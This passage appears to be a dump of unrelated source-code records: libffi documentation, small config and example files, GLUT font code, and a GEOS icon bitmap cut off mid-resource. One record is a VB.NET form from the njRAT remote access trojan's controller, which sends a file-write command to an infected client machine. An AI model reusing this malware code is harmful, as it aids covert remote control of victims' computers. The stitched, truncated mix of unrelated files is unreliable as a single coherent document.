unsigned int @var{nfixedargs}, unsigned int var{ntotalargs}, ffi_type *@var{rtype}, ffi_type **@var{argtypes})\nThis initializes @var{cif} according to the given parameters for\na call to a variadic function. In general it's operation is the\nsame as for @code{ffi_prep_cif} except that:\n\n@var{nfixedargs} is the number of fixed arguments, prior to any\nvariadic arguments. It must be greater than zero.\n\n@var{ntotalargs} the total number of arguments, including variadic\nand fixed arguments.\n\nNote that, different cif's must be prepped for calls to the same\nfunction when different numbers of arguments are passed.\n\nAlso note that a call to @code{ffi_prep_cif_var} with\n@var{nfixedargs}=@var{nototalargs} is NOT equivalent to a call to\n@code{ffi_prep_cif}.\n\n@end defun\n\n\nTo call a function using an initialized @code{ffi_cif}, use the\n@code{ffi_call} function:\n\n@findex ffi_call\n@defun void ffi_call (ffi_cif *@var{cif}, void *@var{fn}, void *@var{rvalue}, void **@var{avalues})\nThis calls the function @var{fn} according to the description given in\n@var{cif}. @var{cif} must have already been prepared using\n@code{ffi_prep_cif}.\n\n@var{rvalue} is a pointer to a chunk of memory that will hold the\nresult of the function call. This must be large enough to hold the\nresult and must be suitably aligned; it is the caller's responsibility\nto ensure this. If @var{cif} declares that the function returns\n@code{void} (using @code{ffi_type_void}), then @var{rvalue} is\nignored. If @var{rvalue} is @samp{NULL}, then the return value is\ndiscarded.\n\n@var{avalues} is a vector of @code{void *} pointers that point to the\nmemory locations holding the argument values for a call. If @var{cif}\ndeclares that the function has no arguments (i.e., @var{nargs} was 0),\nthen @var{avalues} is ignored. Note that argument values may be\nmodified by the callee (for instance, structs passed by value); the\nburden of copying pass-by-value arguments is placed on the caller.\n@end defun\n\n\n@node Simple Example\n@section Simple Example\n\nHere is a trivial example that calls @code{puts} a few times.\n\n@example\n#include \n#include \n\nint main()\n@{\n ffi_cif cif;\n ffi_type *args[1];\n void *values[1];\n char *s;\n int rc;\n \n /* Initialize the argument info vectors */ \n args[0] = &ffi_type_pointer;\n values[0] = &s;\n \n /* Initialize the cif */\n if (ffi_prep_cif(&cif, FFI_DEFAULT_ABI, 1, \n\t\t &ffi_type_uint, args) == FFI_OK)\n @{\n s = \"Hello World!\";\n ffi_call(&cif, puts, &rc, values);\n /* rc now holds the result of the call to puts */\n \n /* values holds a pointer to the function's arg, so to \n call puts() again all we need to do is change the \n value of s */\n s = \"This is cool!\";\n ffi_call(&cif, puts, &rc, values);\n @}\n \n return 0;\n@}\n@end example\n\n\n@node Types\n@section Types\n\n@menu\n* Primitive Types:: Built-in types.\n* Structures:: Structure types.\n* Type Example:: Structure type example.\n@end menu\n\n@node Primitive Types\n@subsection Primitive Types\n\n@code{Libffi} provides a number of built-in type descriptors that can\nbe used to describe argument and return types:\n\n@table @code\n@item ffi_type_void\n@tindex ffi_type_void\nThe type @code{void}. This cannot be used for argument types, only\nfor return values.\n\n@item ffi_type_uint8\n@tindex ffi_type_uint8\nAn unsigned, 8-bit integer type.\n\n@item ffi_type_sint8\n@tindex ffi_type_sint8\nA signed, 8-bit integer type.\n\n@item ffi_type_uint16\n@tindex ffi_type_uint16\nAn unsigned, 16-bit integer type.\n\n@item ffi_type_sint16\n@tindex ffi_type_sint16\nA signed, 16-bit integer type.\n\n@item ffi_type_uint32\n@tindex ffi_type_uint32\nAn unsigned, 32-bit integer type.\n\n@item ffi_type_sint32\n@tindex ffi_type_sint32\nA signed, 32-bit integer type.\n\n@item ffi_type_uint64\n@tindex ffi_type_uint64\nAn unsigned, 64-bit integer type.\n\n@item ffi_type_sint64\n@tindex ffi_type_sint64\nA signed, 64-bit integer type.\n\n@item ffi_type_float\n@tindex ffi_type_float\nThe C @code{float} type.\n\n@item ffi_type_double\n@tindex ffi_type_double\nThe C @code{double} type.\n\n@item ffi_type_uchar\n@tindex ffi_type_uchar\nThe C @code{unsigned char} type.\n\n@item ffi_type_schar\n@tindex ffi_type_schar\nThe C @code{signed char} type. (Note that there is not an exact\nequivalent to the C @code{char} type in @code{libffi}; ordinarily you\nshould either use @code{ffi_type_schar} or @code{ffi_type_uchar}\ndepending on whether @code{char} is signed.)\n\n@item ffi_type_ushort\n@tindex ffi_type_ushort\nThe C @code{unsigned short} type.\n\n@item ffi_type_sshort\n@tindex ffi_type_sshort\nThe C @code{short} type.\n\n@item ffi_type_uint\n@tindex ffi_type_uint\nThe C @code{unsigned int} type.\n\n@item ffi_type_sint\n@tindex ffi_type_sint\nThe C @code{int} type.\n\n@item ffi_type_ulong\n@tindex ffi_type_ulong\nThe C @code{unsigned long} type.\n\n@item ffi_type_slong\n@tindex ffi_type_slong\nThe C @code{long} type.\n\n@item ffi_type_longdouble\n@tindex ffi_type_longdouble\nOn platforms that have a C @code{long double} type, this is defined.\nOn other platforms, it is not.\n\n@item ffi_type_pointer\n@tindex ffi_type_pointer\nA generic @code{void *} pointer. You should use this for all\npointers, regardless of their real type.\n@end table\n\nEach of these is of type @code{ffi_type}, so you must take the address\nwhen passing to @code{ffi_prep_cif}.\n\n\n@node Structures\n@subsection Structures\n\nAlthough @samp{libffi} has no special support for unions or\nbit-fields, it is perfectly happy passing structures back and forth.\nYou must first describe the structure to @samp{libffi} by creating a\nnew @code{ffi_type} object for it.\n\n@tindex ffi_type\n@deftp ffi_type\nThe @code{ffi_type} has the following members:\n@table @code\n@item size_t size\nThis is set by @code{libffi}; you should initialize it to zero.\n\n@item unsigned short alignment\nThis is set by @code{libffi}; you should initialize it to zero.\n\n@item unsigned short type\nFor a structure, this should be set to @code{FFI_TYPE_STRUCT}.\n\n@item ffi_type **elements\nThis is a @samp{NULL}-terminated array of pointers to @code{ffi_type}\nobjects. There is one element per field of the struct.\n@end table\n@end deftp\n\n\n@node Type Example\n@subsection Type Example\n\nThe following example initializes a @code{ffi_type} object\nrepresenting the @code{tm} struct from Linux's @file{time.h}.\n\nHere is how the struct is defined:\n\n@example\nstruct tm @{\n int tm_sec;\n int tm_min;\n int tm_hour;\n int tm_mday;\n int tm_mon;\n int tm_year;\n int tm_wday;\n int tm_yday;\n int tm_isdst;\n /* Those are for future use. */\n long int __tm_gmtoff__;\n __const char *__tm_zone__;\n@};\n@end example\n\nHere is the corresponding code to describe this struct to\n@code{libffi}:\n\n@example\n @{\n ffi_type tm_type;\n ffi_type *tm_type_elements[12];\n int i;\n\n tm_type.size = tm_type.alignment = 0;\n tm_type.elements = &tm_type_elements;\n \n for (i = 0; i < 9; i++)\n tm_type_elements[i] = &ffi_type_sint;\n\n tm_type_elements[9] = &ffi_type_slong;\n tm_type_elements[10] = &ffi_type_pointer;\n tm_type_elements[11] = NULL;\n\n /* tm_type can now be used to represent tm argument types and\n\t return types for ffi_prep_cif() */\n @}\n@end example\n\n\n@node Multiple ABIs\n@section Multiple ABIs\n\nA given platform may provide multiple different ABIs at once. For\ninstance, the x86 platform has both @samp{stdcall} and @samp{fastcall}\nfunctions.\n\n@code{libffi} provides some support for this. However, this is\nnecessarily platform-specific.\n\n@c FIXME: document the platforms\n\n@node The Closure API\n@section The Closure API\n\n@code{libffi} also provides a way to write a generic function -- a\nfunction that can accept and decode any combination of arguments.\nThis can be useful when writing an interpreter, or to provide wrappers\nfor arbitrary functions.\n\nThis facility is called the @dfn{closure API}. Closures are not\nsupported on all platforms; you can check the @code{FFI_CLOSURES}\ndefine to determine whether they are supported on the current\nplatform.\n@cindex closures\n@cindex closure API\n@findex FFI_CLOSURES\n\nBecause closures work by assembling a tiny function at runtime, they\nrequire special allocation on platforms that have a non-executable\nheap. Memory management for closures is handled by a pair of\nfunctions:\n\n@findex ffi_closure_alloc\n@defun void *ffi_closure_alloc (size_t @var{size}, void **@var{code})\nAllocate a chunk of memory holding @var{size} bytes. This returns a\npointer to the writable address, and sets *@var{code} to the\ncorresponding executable address.\n\n@var{size} should be sufficient to hold a @code{ffi_closure} object.\n@end defun\n\n@findex ffi_closure_free\n@defun void ffi_closure_free (void *@var{writable})\nFree memory allocated using @code{ffi_closure_alloc}. The argument is\nthe writable address that was returned.\n@end defun\n\n\nOnce you have allocated the memory for a closure, you must construct a\n@code{ffi_cif} describing the function call. Finally you can prepare\nthe closure function:\n\n@findex ffi_prep_closure_loc\n@defun ffi_status ffi_prep_closure_loc (ffi_closure *@var{closure}, ffi_cif *@var{cif}, void (*@var{fun}) (ffi_cif *@var{cif}, void *@var{ret}, void **@var{args}, void *@var{user_data}), void *@var{user_data}, void *@var{codeloc})\nPrepare a closure function.\n\n@var{closure} is the address of a @code{ffi_closure} object; this is\nthe writable address returned by @code{ffi_closure_alloc}.\n\n@var{cif} is the @code{ffi_cif} describing the function parameters.\n\n@var{user_data} is an arbitrary datum that is passed, uninterpreted,\nto your closure function.\n\n@var{codeloc} is the executable address returned by\n@code{ffi_closure_alloc}.\n\n@var{fun} is the function which will be called when the closure is\ninvoked. It is called with the arguments:\n@table @var\n@item cif\nThe @code{ffi_cif} passed to @code{ffi_prep_closure_loc}.\n\n@item ret\nA pointer to the memory used for the function's return value.\n@var{fun} must fill this, unless the function is declared as returning\n@code{void}.\n@c FIXME: is this NULL for void-returning functions?\n\n@item args\nA vector of pointers to memory holding the arguments to the function.\n\n@item user_data\nThe same @var{user_data} that was passed to\n@code{ffi_prep_closure_loc}.\n@end table\n\n@code{ffi_prep_closure_loc} will return @code{FFI_OK} if everything\nwent ok, and something else on error.\n@c FIXME: what?\n\nAfter calling @code{ffi_prep_closure_loc}, you can cast @var{codeloc}\nto the appropriate pointer-to-function type.\n@end defun\n\nYou may see old code referring to @code{ffi_prep_closure}. This\nfunction is deprecated, as it cannot handle the need for separate\nwritable and executable addresses.\n\n@node Closure Example\n@section Closure Example\n\nA trivial example that creates a new @code{puts} by binding \n@code{fputs} with @code{stdin}.\n\n@example\n#include \n#include \n\n/* Acts like puts with the file given at time of enclosure. */\nvoid puts_binding(ffi_cif *cif, unsigned int *ret, void* args[], \n FILE *stream)\n@{\n *ret = fputs(*(char **)args[0], stream);\n@}\n\nint main()\n@{\n ffi_cif cif;\n ffi_type *args[1];\n ffi_closure *closure;\n\n int (*bound_puts)(char *);\n int rc;\n \n /* Allocate closure and bound_puts */\n closure = ffi_closure_alloc(sizeof(ffi_closure), &bound_puts);\n\n if (closure)\n @{\n /* Initialize the argument info vectors */\n args[0] = &ffi_type_pointer;\n\n /* Initialize the cif */\n if (ffi_prep_cif(&cif, FFI_DEFAULT_ABI, 1,\n &ffi_type_uint, args) == FFI_OK)\n @{\n /* Initialize the closure, setting stream to stdout */\n if (ffi_prep_closure_loc(closure, &cif, puts_binding, \n stdout, bound_puts) == FFI_OK)\n @{\n rc = bound_puts(\"Hello World!\");\n /* rc now holds the result of the call to fputs */\n @}\n @}\n @}\n\n /* Deallocate both closure, and bound_puts */\n ffi_closure_free(closure);\n\n return 0;\n@}\n\n@end example\n\n\n@node Missing Features\n@chapter Missing Features\n\n@code{libffi} is missing a few features. We welcome patches to add\nsupport for these.\n\n@itemize @bullet\n@item\nVariadic closures.\n\n@item\nThere is no support for bit fields in structures.\n\n@item\nThe closure API is\n\n@c FIXME: ...\n\n@item\nThe ``raw'' API is undocumented.\n@c argument promotion?\n@c unions?\n@c anything else?\n@end itemize\n\nNote that variadic support is very new and tested on a relatively\nsmall number of platforms.\n\n@node Index\n@unnumbered Index\n\n@printindex cp\n\n@bye\n"} {"text": "module.exports = {\n plugins: {\n autoprefixer: {}\n }\n}\n"} {"text": "Imports Microsoft.VisualBasic.CompilerServices\nImports System\nImports System.ComponentModel\nImports System.Diagnostics\nImports System.Drawing\nImports System.Runtime.CompilerServices\nImports System.Windows.Forms\nImports NJRAT.NJRAT\n\nPublic Class Note\n Public FN As String\n Public SK As Client\n Private Sub ToolStripMenuItem1_Click(sender As Object, e As EventArgs) Handles ToolStripMenuItem1.Click\n Dim strArray As String() = New String(9 - 1) {}\n strArray(0) = \"Ex\"\n strArray(1) = Class7.string_1\n strArray(2) = \"fm\"\n strArray(3) = Class7.string_1\n strArray(4) = \"wr\"\n strArray(5) = Class7.string_1\n strArray(6) = Class6.smethod_14(Me.FN)\n strArray(7) = Class7.string_1\n Dim box As TextBox = Me.TextBox1\n Dim text As String = box.Text\n box.Text = [text]\n strArray(8) = Class6.smethod_14([text])\n Me.SK.Send(String.Concat(strArray))\n Me.ToolStripMenuItem1.Enabled = False\n End Sub\n\n Private Sub TextBox1_TextChanged(sender As Object, e As EventArgs) Handles TextBox1.TextChanged\n Me.ToolStripMenuItem1.Enabled = True\n End Sub\nEnd Class"} {"text": "#!/bin/sh\napt-get install binfmt-support qemu qemu-user-static debootstrap kpartx lvm2 dosfstools apt-cacher-ng\n"} {"text": "/*\n * Sonatype Nexus (TM) Open Source Version\n * Copyright (c) 2008-present Sonatype, Inc.\n * All rights reserved. Includes the third-party code listed at http://links.sonatype.com/products/nexus/oss/attributions.\n *\n * This program and the accompanying materials are made available under the terms of the Eclipse Public License Version 1.0,\n * which accompanies this distribution and is available at http://www.eclipse.org/legal/epl-v10.html.\n *\n * Sonatype Nexus (TM) Professional Version is available from Sonatype, Inc. \"Sonatype\" and \"Sonatype Nexus\" are trademarks\n * of Sonatype, Inc. Apache Maven is a trademark of the Apache Software Foundation. M2eclipse is a trademark of the\n * Eclipse Foundation. All other trademarks are the property of their respective owners.\n */\n\n/**\n * Repository view framework.\n *\n * @since 3.0\n */\npackage org.sonatype.nexus.repository.view;"} {"text": "package sample;\n\n/*\n If statement Example\n This Java Example shows how to use if statement in Java program.\n*/\n\npublic class SimpleIfStatementExample {\n\n public static void main(String[] args) {\n\n /*\n * If statement is used to execute an action if particular condition is true.\n * Syntax of if statement is,\n *\n * if()\n * \n *\n * while is a boolean expression, and statement is a valied java\n * statement which will be executed if is true. To use multiple\n * statements, enclose them in a block.\n *\n */\n\n boolean blnStatus = true;\n\n if (blnStatus) System.out.println(\"Status is true\");\n }\n}\n\n/*\n Output would be\n Status is true\n */\n"} {"text": "\"use strict\";\nObject.defineProperty(exports, \"__esModule\", { value: true });\nconst NucleoObject_1 = require(\"./../nucleoTypes/NucleoObject\");\nclass NucleoList {\n constructor(config) {\n this.getListChildrenType = () => {\n // TODO: oh please, improve this shit\n if (this.NucleoObject) {\n return 'NucleoObject';\n }\n return 'NucleoPrimitive';\n };\n if (config instanceof NucleoObject_1.default) {\n this.NucleoObject = config;\n }\n this.NucleoPrimitive = { Type: config.Type, serialize: config.serialize };\n }\n}\nexports.default = NucleoList;\n//# sourceMappingURL=NucleoList.js.map"} {"text": "---\ncurrentMenu: disabled \n---\n\n# Demo: Disabled\n\n\n\n\n\n- [Example code](#example-code)\n- [Example HTML](#example-html)\n\n\nright click me\n\n## Example code\n\n\n\n## Example HTML\n
"} {"text": "# Do not edit. Source files are in /res/country_metadata\nisSlowZoneKnown: true\nmobileCountryCode: 292\nofficialLanguages: [it]\n"} {"text": "namespace MultiLanguage\n{\n using System;\n using System.Runtime.CompilerServices;\n using System.Runtime.InteropServices;\n using System.Security;\n\n [ComImport, InterfaceType((short) 1), Guid(\"F5BE2EE1-BFD7-11D0-B188-00AA0038C969\")]\n public interface IMLangLineBreakConsole\n {\n [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType=MethodCodeType.Runtime)]\n void BreakLineML([In, MarshalAs(UnmanagedType.Interface)] CMLangString pSrcMLStr, [In] int lSrcPos, [In] int lSrcLen, [In] int cMinColumns, [In] int cMaxColumns, out int plLineLen, out int plSkipLen);\n [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType=MethodCodeType.Runtime)]\n void BreakLineW([In] uint locale, [In] ref ushort pszSrc, [In] int cchSrc, [In] int cMaxColumns, out int pcchLine, out int pcchSkip);\n [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType=MethodCodeType.Runtime)]\n void BreakLineA([In] uint locale, [In] uint uCodePage, [In] ref sbyte pszSrc, [In] int cchSrc, [In] int cMaxColumns, out int pcchLine, out int pcchSkip);\n }\n}\n"} {"text": "\n/* Copyright (c) Mark J. Kilgard, 1995. */\n\n/* This program is freely distributable without licensing fees \n and is provided without guarantee or warrantee expressed or \n implied. This program is -not- in the public domain. */\n\n#include \"glutint.h\"\n#include \"glutstroke.h\"\n\n/* CENTRY */\nint APIENTRY \nglutStrokeWidth(GLUTstrokeFont font, int c)\n{\n StrokeFontPtr fontinfo;\n const StrokeCharRec *ch;\n\n#if defined(_WIN32)\n fontinfo = (StrokeFontPtr) __glutFont(font);\n#else\n fontinfo = (StrokeFontPtr) font;\n#endif\n\n if (c < 0 || c >= fontinfo->num_chars)\n return 0;\n ch = &(fontinfo->ch[c]);\n if (ch)\n return ch->right;\n else\n return 0;\n}\n\nint APIENTRY \nglutStrokeLength(GLUTstrokeFont font, const unsigned char *string)\n{\n int c, length;\n StrokeFontPtr fontinfo;\n const StrokeCharRec *ch;\n\n#if defined(_WIN32)\n fontinfo = (StrokeFontPtr) __glutFont(font);\n#else\n fontinfo = (StrokeFontPtr) font;\n#endif\n\n length = 0;\n for (; *string != '\\0'; string++) {\n c = *string;\n if (c >= 0 && c < fontinfo->num_chars) {\n ch = &(fontinfo->ch[c]);\n if (ch)\n length += ch->right;\n }\n }\n return length;\n}\n\n/* ENDCENTRY */\n"} {"text": "/*\r\n * Moniker generated from PCX/deskicon.pcx with pixel 13 masked out\r\n */\r\nstart AppIconAreaSCMonikerResource, data;\r\nvisMoniker DisconnectButtonSCMoniker = {\r\n\tsize = standard;\r\n\tstyle = icon;\r\n\taspectRatio = normal;\r\n\tcolor = color4;\r\n\tcachedSize = 48, 30;\r\n\tgstring {\r\n\t\tGSBeginString\r\n\t\tGSDrawBitmapAtCP 906\r\n\t\tBitmap <48,30,0,BMF_4BIT or mask BMT_MASK>\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd\r\n\tdb\t0x00, 0x00, 0x01, 0x00, 0x00, 0x00\r\n\tdb\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xde, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd\r\n\tdb\t0x00, 0x80, 0x21, 0x08, 0x02, 0x00\r\n\tdb\t0xdd, 0xdd, 0xdd, 0xdd, 0x0d, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xed, 0xdd, 0xde, 0xdd, 0xdd, 0xed, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0x0d, 0xdd, 0xdd, 0xdd, 0xdd\r\n\tdb\t0x01, 0xc0, 0x11, 0x10, 0x03, 0x00\r\n\tdb\t0xdd, 0xdd, 0xdd, 0xd0, 0x08, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xde, 0xdd, 0xde, 0xdd, 0xde, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0x00, 0xdd, 0xdd, 0xdd, 0xdd\r\n\tdb\t0x03, 0xc0, 0x11, 0x10, 0x03, 0x80\r\n\tdb\t0xdd, 0xdd, 0xdd, 0x0f, 0x08, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xde, 0xdd, 0xde, 0xdd, 0xde, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0x0f, 0x0d, 0xdd, 0xdd, 0xdd\r\n\tdb\t0x07, 0xc0, 0x08, 0x20, 0x03, 0xc0\r\n\tdb\t0xdd, 0xdd, 0xd0, 0xff, 0x08, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xed, 0xdd, 0xdd, 0xed, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0x0f, 0xf0, 0xdd, 0xdd, 0xdd\r\n\tdb\t0x0f, 0xc0, 0x08, 0x20, 0x03, 0xe0\r\n\tdb\t0xdd, 0xdd, 0x0f, 0xff, 0x08, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xed, 0xdd, 0xdd, 0xed, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0x0f, 0xff, 0x0d, 0xdd, 0xdd\r\n\tdb\t0x1f, 0xff, 0xc4, 0x4f, 0xff, 0xf0\r\n\tdb\t0xdd, 0xd0, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, \r\n\t\t0x00, 0xdd, 0xde, 0xdd, 0xde, 0xdd, 0x00, 0x00, \r\n\t\t0x00, 0x00, 0x00, 0x0f, 0xff, 0xf0, 0xdd, 0xdd\r\n\tdb\t0x3f, 0xff, 0xe0, 0x0f, 0xff, 0xf8\r\n\tdb\t0xdd, 0x0f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, \r\n\t\t0xf0, 0x8d, 0xdd, 0xdd, 0xdd, 0xdd, 0x0f, 0xff, \r\n\t\t0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x0d, 0xdd\r\n\tdb\t0x7f, 0xff, 0xe0, 0x0f, 0xff, 0xfc\r\n\tdb\t0xd0, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, \r\n\t\t0xf0, 0x8d, 0xdd, 0xdd, 0xdd, 0xdd, 0x0f, 0xff, \r\n\t\t0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf0, 0xdd\r\n\tdb\t0xff, 0xff, 0xe0, 0x0f, 0xff, 0xfe\r\n\tdb\t0x0f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, \r\n\t\t0xf0, 0x8d, 0xdd, 0xdd, 0xdd, 0xdd, 0x0f, 0xff, \r\n\t\t0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x0d\r\n\tdb\t0x7f, 0xff, 0xe0, 0x0f, 0xff, 0xff\r\n\tdb\t0xd0, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, \r\n\t\t0xf0, 0x8d, 0xdd, 0xdd, 0xdd, 0xdd, 0x0f, 0xff, \r\n\t\t0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf0, 0x88\r\n\tdb\t0x3f, 0xff, 0xe0, 0x0f, 0xff, 0xfe\r\n\tdb\t0xdd, 0x0f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, \r\n\t\t0xf0, 0x8d, 0xdd, 0xdd, 0xdd, 0xdd, 0x0f, 0xff, \r\n\t\t0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x08, 0x8d\r\n\tdb\t0x1f, 0xff, 0xe0, 0x0f, 0xff, 0xfc\r\n\tdb\t0xdd, 0xd0, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, \r\n\t\t0x00, 0x8d, 0xdd, 0xdd, 0xdd, 0xdd, 0x00, 0x00, \r\n\t\t0x00, 0x00, 0x00, 0x0f, 0xff, 0xf0, 0x88, 0xdd\r\n\tdb\t0x0f, 0xff, 0xe4, 0x47, 0xff, 0xf8\r\n\tdb\t0xdd, 0xdd, 0x0f, 0xff, 0x08, 0x88, 0x88, 0x88, \r\n\t\t0x88, 0x8d, 0xde, 0xdd, 0xde, 0xdd, 0xd8, 0x88, \r\n\t\t0x88, 0x88, 0x88, 0x0f, 0xff, 0x08, 0x8d, 0xdd\r\n\tdb\t0x07, 0xc0, 0x08, 0x20, 0x03, 0xf0\r\n\tdb\t0xdd, 0xdd, 0xd0, 0xff, 0x08, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xed, 0xdd, 0xdd, 0xed, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0x0f, 0xf0, 0x88, 0xdd, 0xdd\r\n\tdb\t0x03, 0xc0, 0x08, 0x20, 0x03, 0xe0\r\n\tdb\t0xdd, 0xdd, 0xdd, 0x0f, 0x08, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xed, 0xdd, 0xdd, 0xed, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0x0f, 0x08, 0x8d, 0xdd, 0xdd\r\n\tdb\t0x01, 0xc0, 0x11, 0x10, 0x03, 0xc0\r\n\tdb\t0xdd, 0xdd, 0xdd, 0xd0, 0x08, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xde, 0xdd, 0xde, 0xdd, 0xde, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0x00, 0x88, 0xdd, 0xdd, 0xdd\r\n\tdb\t0x00, 0xc0, 0x11, 0x10, 0x03, 0x80\r\n\tdb\t0xdd, 0xdd, 0xdd, 0xdd, 0x08, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xde, 0xdd, 0xde, 0xdd, 0xde, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0x08, 0x8d, 0xdd, 0xdd, 0xdd\r\n\tdb\t0x00, 0x40, 0x21, 0x08, 0x01, 0x00\r\n\tdb\t0xdd, 0xdd, 0xdd, 0xdd, 0xd8, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xed, 0xdd, 0xde, 0xdd, 0xdd, 0xed, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xd8, 0xdd, 0xdd, 0xdd, 0xdd\r\n\tdb\t0x00, 0x00, 0x01, 0x00, 0x00, 0x00\r\n\tdb\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xde, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, \r\n\t\t0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd\r\n\t\tGSEndString\r\n\t}\r\n}\r\nend AppIconAreaSCMonikerResource;\r\n/*\r\n * Moniker generated from PCX/deskicon.pcx with pixel 13 masked out\r\n */\r\nstart AppIconAreaSMMonikerResource, data;\r\nvisMoniker 